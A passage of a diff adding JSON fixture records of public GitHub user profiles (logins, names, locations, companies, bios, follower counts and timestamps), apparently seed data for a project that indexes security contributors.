"2024-09-22T19:35:42.280Z", + "name": "Panda", + "login": "Homopatrol", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58219367?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2019-11-26T13:06:09Z", + "updated_at": "2024-09-07T20:02:18Z", + "node_id": "MDQ6VXNlcjU4MjE5MzY3", + "bio": "Getting to grips with Cloud Security and trying to help others along the way.\r\n---->\r\nMy name is not targeted at anyone, I myself a proud LGBTQ+ member. <----", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2172, + "fields": { + "nest_created_at": "2024-09-12T01:10:22.176Z", + "nest_updated_at": "2024-09-22T19:37:31.740Z", + "name": "", + "login": "ptrovatelli", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34663482?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 2, + "public_repositories_count": 14, + "created_at": "2017-12-18T21:48:50Z", + "updated_at": "2024-09-13T14:20:23Z", + "node_id": "MDQ6VXNlcjM0NjYzNDgy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2173, + "fields": { + "nest_created_at": "2024-09-12T01:10:23.463Z", + "nest_updated_at": "2024-09-22T19:38:33.733Z", + "name": "Fred Blaise", + "login": "madchap", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5468769?v=4", + "company": "", + "location": "Vaud, Switzerland", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 42, + "public_gists_count": 22, + "public_repositories_count": 87, + "created_at": "2013-09-16T10:09:23Z", + "updated_at": "2024-08-24T11:24:49Z", + "node_id": "MDQ6VXNlcjU0Njg3Njk=", + "bio": "Product Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2174, + "fields": { + "nest_created_at": "2024-09-12T01:10:27.252Z", + "nest_updated_at": "2024-09-12T01:10:27.252Z", + "name": "", + "login": "chanduaki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/54622987?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2019-08-28T09:32:06Z", + "updated_at": "2024-07-15T14:04:40Z", + "node_id": "MDQ6VXNlcjU0NjIyOTg3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2175, + "fields": { + "nest_created_at": "2024-09-12T01:10:28.115Z", + "nest_updated_at": "2024-09-12T01:11:08.591Z", + "name": "", + "login": "zakrush", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33844164?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 4, + "public_repositories_count": 14, + "created_at": "2017-11-20T19:24:14Z", + "updated_at": "2023-11-16T06:45:31Z", + "node_id": "MDQ6VXNlcjMzODQ0MTY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2176, + "fields": { + "nest_created_at": "2024-09-12T01:10:30.251Z", + "nest_updated_at": "2024-09-22T19:36:21.559Z", + "name": "Tiago Posse", + "login": "tiagoposse", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2262091?v=4", + "company": "", + "location": "Vienna", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 36, + "created_at": "2012-09-01T19:03:48Z", + "updated_at": "2024-09-03T06:13:19Z", + "node_id": "MDQ6VXNlcjIyNjIwOTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2177, + "fields": { + "nest_created_at": "2024-09-12T01:10:31.892Z", + "nest_updated_at": "2024-09-12T01:10:44.933Z", + "name": "", + "login": "pgabriel10", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90704745?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-09-14T14:12:23Z", + "updated_at": "2023-08-30T00:20:53Z", + "node_id": "MDQ6VXNlcjkwNzA0NzQ1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2178, + "fields": { + "nest_created_at": "2024-09-12T01:10:33.661Z", + "nest_updated_at": "2024-09-12T01:10:57.996Z", + "name": "", + "login": "techylinux", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37924175?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2018-03-30T06:39:14Z", + "updated_at": "2021-08-07T16:04:44Z", + "node_id": "MDQ6VXNlcjM3OTI0MTc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2179, + "fields": { + "nest_created_at": "2024-09-12T01:10:35.314Z", + "nest_updated_at": "2024-09-22T19:34:58.961Z", + "name": "", + "login": "kiblik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5609770?v=4", + "company": "", + "location": "Earth", + "collaborators_count": 0, + "following_count": 34, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 48, + "created_at": "2013-10-04T08:21:42Z", + "updated_at": "2024-09-20T15:52:01Z", + "node_id": "MDQ6VXNlcjU2MDk3NzA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2180, + "fields": { + "nest_created_at": "2024-09-12T01:10:36.962Z", + "nest_updated_at": "2024-09-22T19:37:32.480Z", + "name": "Sever", + "login": "dsever", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7211879?v=4", + "company": "", + "location": "Croatia", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 49, + "created_at": "2014-04-07T17:08:44Z", + "updated_at": "2024-07-11T15:41:25Z", + "node_id": "MDQ6VXNlcjcyMTE4Nzk=", + "bio": "Squad Lead, Deutsche Telekom Cloud Services", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2181, + "fields": { + "nest_created_at": "2024-09-12T01:10:38.631Z", + "nest_updated_at": "2024-09-12T01:10:40.317Z", + "name": "", + "login": "rinaldistefano", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71335929?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-09-15T14:47:13Z", + "updated_at": "2023-01-05T07:55:28Z", + "node_id": "MDQ6VXNlcjcxMzM1OTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2182, + "fields": { + "nest_created_at": "2024-09-12T01:10:41.981Z", + "nest_updated_at": "2024-09-12T01:10:49.980Z", + "name": "Mircea-Pavel Anton", + "login": "mircea-pavel-anton", + "email": "contact@mirceanton.com", + "avatar_url": "https://avatars.githubusercontent.com/u/28601784?v=4", + "company": "Raiffeisen Bank Romania", + "location": "Bucharest, Romania", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 44, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2017-05-10T15:03:49Z", + "updated_at": "2024-09-04T16:38:43Z", + "node_id": "MDQ6VXNlcjI4NjAxNzg0", + "bio": "DevOps Engineer, Gym Rat and Drummer.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2183, + "fields": { + "nest_created_at": "2024-09-12T01:10:46.252Z", + "nest_updated_at": "2024-09-12T01:10:46.252Z", + "name": "Tomáš Novák", + "login": "MioOgbeni", + "email": "tom.nov96@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/24291977?v=4", + "company": "@broker-consulting ", + "location": "Prague, Czech Republic", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 3, + "public_gists_count": 12, + "public_repositories_count": 18, + "created_at": "2016-12-01T09:55:47Z", + "updated_at": "2024-06-16T14:31:02Z", + "node_id": "MDQ6VXNlcjI0MjkxOTc3", + "bio": "DevOps Engineer at Broker Consulting a.s.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2184, + "fields": { + "nest_created_at": "2024-09-12T01:10:48.711Z", + "nest_updated_at": "2024-09-12T01:15:13.161Z", + "name": "", + "login": "r0bag", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/18007694?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2016-03-22T13:09:20Z", + "updated_at": "2024-07-30T13:13:36Z", + "node_id": "MDQ6VXNlcjE4MDA3Njk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2185, + "fields": { + "nest_created_at": "2024-09-12T01:10:51.251Z", + "nest_updated_at": "2024-09-22T19:36:34.131Z", + "name": "", + "login": "AndreVirtimo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11404063?v=4", + "company": "Virtimo AG", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 10, + "created_at": "2015-03-10T08:19:18Z", + "updated_at": "2024-08-15T04:27:28Z", + "node_id": "MDQ6VXNlcjExNDA0MDYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2186, + "fields": { + "nest_created_at": "2024-09-12T01:10:52.513Z", + "nest_updated_at": "2024-09-12T01:10:52.513Z", + "name": "", + "login": "jonathan-hafner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84336164?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-05-17T15:13:12Z", + "updated_at": "2023-10-04T13:01:56Z", + "node_id": "MDQ6VXNlcjg0MzM2MTY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2187, + "fields": { + "nest_created_at": "2024-09-12T01:10:55.099Z", + "nest_updated_at": "2024-09-12T01:10:55.099Z", + "name": "", + "login": "oliversommer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9266650?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-10-16T11:24:03Z", + "updated_at": "2023-12-22T17:18:24Z", + "node_id": "MDQ6VXNlcjkyNjY2NTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2188, + "fields": { + "nest_created_at": "2024-09-12T01:10:59.256Z", + "nest_updated_at": "2024-09-12T01:10:59.256Z", + "name": "", + "login": "zappaar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44434135?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-10-24T11:22:39Z", + "updated_at": "2023-11-25T17:54:27Z", + "node_id": "MDQ6VXNlcjQ0NDM0MTM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2189, + "fields": { + "nest_created_at": "2024-09-12T01:11:00.075Z", + "nest_updated_at": "2024-09-12T01:14:15.226Z", + "name": "salvatore d'amico", + "login": "saldam72", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72754155?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-10-12T15:38:12Z", + "updated_at": "2024-02-02T14:36:41Z", + "node_id": "MDQ6VXNlcjcyNzU0MTU1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2190, + "fields": { + "nest_created_at": "2024-09-12T01:11:02.601Z", + "nest_updated_at": "2024-09-12T01:11:03.837Z", + "name": "Alexandre Teyar", + "login": "aress31", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11601622?v=4", + "company": "@aegiscyber ", + "location": "Warrington, United Kingdom", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 345, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2015-03-22T19:32:19Z", + "updated_at": "2024-08-30T08:20:18Z", + "node_id": "MDQ6VXNlcjExNjAxNjIy", + "bio": "Keep calm and hack something, but remember to wear a ninja mask for added stealth. 🐱‍👤😎", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2191, + "fields": { + "nest_created_at": "2024-09-12T01:11:05.083Z", + "nest_updated_at": "2024-09-22T19:36:04.547Z", + "name": "Mike Lloyd", + "login": "mike-lloyd03", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49411532?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 15, + "public_gists_count": 1, + "public_repositories_count": 93, + "created_at": "2019-04-08T17:44:35Z", + "updated_at": "2024-09-03T12:06:36Z", + "node_id": "MDQ6VXNlcjQ5NDExNTMy", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2192, + "fields": { + "nest_created_at": "2024-09-12T01:11:06.033Z", + "nest_updated_at": "2024-09-22T19:35:08.320Z", + "name": "Aleg Vilinski", + "login": "italvi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58322186?v=4", + "company": "@festo-se", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2019-11-29T06:28:49Z", + "updated_at": "2024-07-03T09:39:40Z", + "node_id": "MDQ6VXNlcjU4MzIyMTg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2193, + "fields": { + "nest_created_at": "2024-09-12T01:11:07.303Z", + "nest_updated_at": "2024-09-22T19:35:35.268Z", + "name": "", + "login": "kokhanevych-macpaw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81617047?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-03-30T08:33:46Z", + "updated_at": "2024-05-10T09:47:46Z", + "node_id": "MDQ6VXNlcjgxNjE3MDQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2194, + "fields": { + "nest_created_at": "2024-09-12T01:11:09.845Z", + "nest_updated_at": "2024-09-12T01:11:09.845Z", + "name": "", + "login": "fxble", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73400438?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-10-24T17:22:51Z", + "updated_at": "2024-08-23T11:44:56Z", + "node_id": "MDQ6VXNlcjczNDAwNDM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2195, + "fields": { + "nest_created_at": "2024-09-12T01:11:11.125Z", + "nest_updated_at": "2024-09-12T01:11:11.125Z", + "name": "Farhan Saif Chowdhury", + "login": "farhansaifchowdhury", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31181169?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-08-20T11:20:58Z", + "updated_at": "2024-02-23T06:22:34Z", + "node_id": "MDQ6VXNlcjMxMTgxMTY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2196, + "fields": { + "nest_created_at": "2024-09-12T01:11:12.379Z", + "nest_updated_at": "2024-09-12T01:11:12.379Z", + "name": "", + "login": "dumprop", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34004367?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 16, + "public_gists_count": 1, + "public_repositories_count": 40, + "created_at": "2017-11-26T14:30:04Z", + "updated_at": "2024-08-14T11:37:11Z", + "node_id": "MDQ6VXNlcjM0MDA0MzY3", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2197, + "fields": { + "nest_created_at": "2024-09-12T01:11:13.605Z", + "nest_updated_at": "2024-09-12T01:11:13.605Z", + "name": "Alex Oladele", + "login": "dragid10", + "email": "dragid10@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4042877?v=4", + "company": "@IBM ", + "location": "Raleigh NC", + "collaborators_count": 0, + "following_count": 70, + "followers_count": 29, + "public_gists_count": 9, + "public_repositories_count": 39, + "created_at": "2013-04-03T00:39:20Z", + "updated_at": "2024-09-02T22:28:30Z", + "node_id": "MDQ6VXNlcjQwNDI4Nzc=", + "bio": "Software Dev / SRE @IBM \r\nI typically write Python and occasionally some Kotlin", + "is_hireable": true, + "twitter_username": "Wizkid_alex" + } +}, +{ + "model": "github.user", + "pk": 2198, + "fields": { + "nest_created_at": "2024-09-12T01:11:14.874Z", + "nest_updated_at": "2024-09-12T01:11:16.097Z", + "name": "", + "login": "Grobatow", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106585630?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-05-31T08:39:41Z", + "updated_at": "2022-10-28T11:35:37Z", + "node_id": "U_kgDOBlpeHg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2199, + "fields": { + "nest_created_at": "2024-09-12T01:11:17.308Z", + "nest_updated_at": "2024-09-12T01:11:17.308Z", + "name": "Arto Jonsson", + "login": "artoj", + "email": "arto@artojonsson.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1174582?v=4", + "company": "", + "location": "Finland", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2011-11-05T15:59:54Z", + "updated_at": "2024-07-18T11:13:25Z", + "node_id": "MDQ6VXNlcjExNzQ1ODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2200, + "fields": { + "nest_created_at": "2024-09-12T01:11:19Z", + "nest_updated_at": "2024-09-12T01:11:19Z", + "name": "Andres Oviedo", + "login": "andresoviedo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1988725?v=4", + "company": "andresoviedo.org", + "location": "Barcelona", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 83, + "public_gists_count": 10, + "public_repositories_count": 8, + "created_at": "2012-07-17T03:39:16Z", + "updated_at": "2024-09-06T20:51:04Z", + "node_id": "MDQ6VXNlcjE5ODg3MjU=", + "bio": "Software developer living in Barcelona. Programming is my passion. Open source is my contribution to the world.\r\nCurrently focused on 3D world", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2201, + "fields": { + "nest_created_at": "2024-09-12T01:11:21.525Z", + "nest_updated_at": "2024-09-12T01:11:21.525Z", + "name": "", + "login": "8L4ckc0FF33", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55756010?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-09-24T15:46:22Z", + "updated_at": "2024-08-20T12:06:17Z", + "node_id": "MDQ6VXNlcjU1NzU2MDEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2202, + "fields": { + "nest_created_at": "2024-09-12T01:11:25.712Z", + "nest_updated_at": "2024-09-22T20:25:39.883Z", + "name": "Gabriel Marquet", + "login": "Gby56", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6706472?v=4", + "company": "Escape", + "location": "Paris", + "collaborators_count": 0, + "following_count": 172, + "followers_count": 25, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2014-02-17T15:44:04Z", + "updated_at": "2024-07-01T09:45:52Z", + "node_id": "MDQ6VXNlcjY3MDY0NzI=", + "bio": "Principal Security Engineer", + "is_hireable": true, + "twitter_username": "gbysec" + } +}, +{ + "model": "github.user", + "pk": 2203, + "fields": { + "nest_created_at": "2024-09-12T01:11:28.612Z", + "nest_updated_at": "2024-09-22T20:23:05.914Z", + "name": "", + "login": "0x4d4e", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91870?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 10, + "public_gists_count": 12, + "public_repositories_count": 70, + "created_at": "2009-06-04T15:25:16Z", + "updated_at": "2024-09-02T11:20:39Z", + "node_id": "MDQ6VXNlcjkxODcw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2204, + "fields": { + "nest_created_at": "2024-09-12T01:11:29.861Z", + "nest_updated_at": "2024-09-12T01:11:32.341Z", + "name": "Avinash", + "login": "de-adshot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11958190?v=4", + "company": "", + "location": "Coimbatore", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2015-04-15T08:35:54Z", + "updated_at": "2024-08-21T22:54:10Z", + "node_id": "MDQ6VXNlcjExOTU4MTkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2205, + "fields": { + "nest_created_at": "2024-09-12T01:11:31.087Z", + "nest_updated_at": "2024-09-22T19:35:46.719Z", + "name": "", + "login": "rc-mattschwager", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93352730?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2021-10-28T21:35:41Z", + "updated_at": "2023-10-03T15:37:31Z", + "node_id": "U_kgDOBZBzGg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2206, + "fields": { + "nest_created_at": "2024-09-12T01:11:33.572Z", + "nest_updated_at": "2024-09-12T01:11:38.134Z", + "name": "Ken Dyck", + "login": "kdyck-cb", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/92729718?v=4", + "company": "CloudBees", + "location": "St Catharines, Ontario, Canada", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2021-10-18T12:18:26Z", + "updated_at": "2024-04-09T18:19:15Z", + "node_id": "U_kgDOBYbxdg", + "bio": "Sr Product Security Engineer at CloudBees", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2207, + "fields": { + "nest_created_at": "2024-09-12T01:11:34.806Z", + "nest_updated_at": "2024-09-22T19:35:15.756Z", + "name": "Ludovic Courgnaud", + "login": "X0x1RG9f", + "email": "ludovic.courgnaud@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23699215?v=4", + "company": "Accor", + "location": "Paris", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2016-11-23T11:46:01Z", + "updated_at": "2024-08-23T11:19:38Z", + "node_id": "MDQ6VXNlcjIzNjk5MjE1", + "bio": "Security, Trading & Astronomy", + "is_hireable": false, + "twitter_username": "X0x1RG9f" + } +}, +{ + "model": "github.user", + "pk": 2208, + "fields": { + "nest_created_at": "2024-09-12T01:11:36.516Z", + "nest_updated_at": "2024-09-12T01:11:36.516Z", + "name": "Anubhav", + "login": "Anubhav357", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68887591?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2020-07-28T04:35:42Z", + "updated_at": "2024-08-25T11:00:09Z", + "node_id": "MDQ6VXNlcjY4ODg3NTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2209, + "fields": { + "nest_created_at": "2024-09-12T01:11:39.352Z", + "nest_updated_at": "2024-09-12T01:11:39.352Z", + "name": "", + "login": "tx-abhay", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100664313?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2022-03-01T05:01:46Z", + "updated_at": "2022-08-26T08:49:47Z", + "node_id": "U_kgDOBgAD-Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2210, + "fields": { + "nest_created_at": "2024-09-12T01:11:40.151Z", + "nest_updated_at": "2024-09-12T01:11:40.151Z", + "name": "Yann Crumeyrolle", + "login": "ycrumeyrolle", + "email": "ycrumeyrolle@free.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/1958836?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 50, + "created_at": "2012-07-11T20:14:42Z", + "updated_at": "2024-09-05T11:26:29Z", + "node_id": "MDQ6VXNlcjE5NTg4MzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2211, + "fields": { + "nest_created_at": "2024-09-12T01:11:41.371Z", + "nest_updated_at": "2024-09-12T01:15:15.680Z", + "name": "Valentin", + "login": "awakenine", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28957954?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 3, + "public_gists_count": 6, + "public_repositories_count": 18, + "created_at": "2017-05-25T16:16:02Z", + "updated_at": "2024-09-05T08:17:19Z", + "node_id": "MDQ6VXNlcjI4OTU3OTU0", + "bio": "Valentin Leikind", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2212, + "fields": { + "nest_created_at": "2024-09-12T01:11:42.602Z", + "nest_updated_at": "2024-09-12T01:11:42.602Z", + "name": "Pavel Nakonechnyi", + "login": "zOrg1331", + "email": "zorg1331@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/321938?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 3, + "public_repositories_count": 41, + "created_at": "2010-07-03T15:01:20Z", + "updated_at": "2024-08-10T14:45:10Z", + "node_id": "MDQ6VXNlcjMyMTkzOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2213, + "fields": { + "nest_created_at": "2024-09-12T01:11:45.978Z", + "nest_updated_at": "2024-09-12T01:11:45.978Z", + "name": "kuldeep singh bharati", + "login": "kuldeep0508", + "email": "ksb0508@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3303034?v=4", + "company": "SOPRA BANKING SOFTWARES", + "location": "Delhi", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-01-18T05:11:11Z", + "updated_at": "2024-03-14T10:16:32Z", + "node_id": "MDQ6VXNlcjMzMDMwMzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2214, + "fields": { + "nest_created_at": "2024-09-12T01:11:46.829Z", + "nest_updated_at": "2024-09-12T01:11:46.829Z", + "name": "Frans Caisar Ramadhan", + "login": "franzramadhan", + "email": "me@franzramadhan.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/1482172?v=4", + "company": "@franirafa ", + "location": "Jakarta", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 21, + "public_gists_count": 24, + "public_repositories_count": 61, + "created_at": "2012-02-28T14:37:30Z", + "updated_at": "2024-09-03T11:23:15Z", + "node_id": "MDQ6VXNlcjE0ODIxNzI=", + "bio": "", + "is_hireable": true, + "twitter_username": "frankyramadhan" + } +}, +{ + "model": "github.user", + "pk": 2215, + "fields": { + "nest_created_at": "2024-09-12T01:11:48.081Z", + "nest_updated_at": "2024-09-12T01:11:48.081Z", + "name": "Valery Korolyov", + "login": "fuzzah", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60884276?v=4", + "company": "Garda Technologies", + "location": "Moscow", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-02-10T13:37:06Z", + "updated_at": "2024-06-09T22:22:54Z", + "node_id": "MDQ6VXNlcjYwODg0Mjc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2216, + "fields": { + "nest_created_at": "2024-09-12T01:11:48.892Z", + "nest_updated_at": "2024-09-12T01:11:48.892Z", + "name": "", + "login": "sergeymeleschenko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34446179?v=4", + "company": "", + 